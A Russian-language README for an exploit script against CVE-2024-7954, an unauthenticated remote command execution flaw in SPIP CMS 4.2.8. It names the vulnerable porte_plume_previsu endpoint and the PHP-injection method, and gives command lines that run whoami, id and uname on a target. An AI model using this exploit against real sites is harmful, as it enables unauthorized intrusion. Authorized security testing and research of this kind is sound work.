
Эксплойт для неаутентифицированного удаленного выполнения команд в SPIP CMS 4.2.8 (CVE-2024-7954) с поддержкой прокси и получением вывода в реальном времени.
Этот скрипт эксплуатирует уязвимость удаленного выполнения кода в SPIP версии 4.2.8 через конечную точку porte_plume_previsu. Уязвимость позволяет неаутентифицированным злоумышленникам внедрять PHP-код через предварительный просмотр сконструированных тегов изображений.
Идентификатор CVE: CVE-2024-7954
Компонент: SPIP CMS (porte_plume_previsu)
Воздействие: Неаутентифицированное удаленное выполнение команд
Серьезность: Критическая
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd <COMMAND> [--proxy <IP:PORT>]
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "whoami" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "id" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "uname -a" --proxy "127.0.0.1:8080"


Этот скрипт эксплойта предназначен только для авторизованного тестирования безопасности, оборонительных исследований и образовательных целей.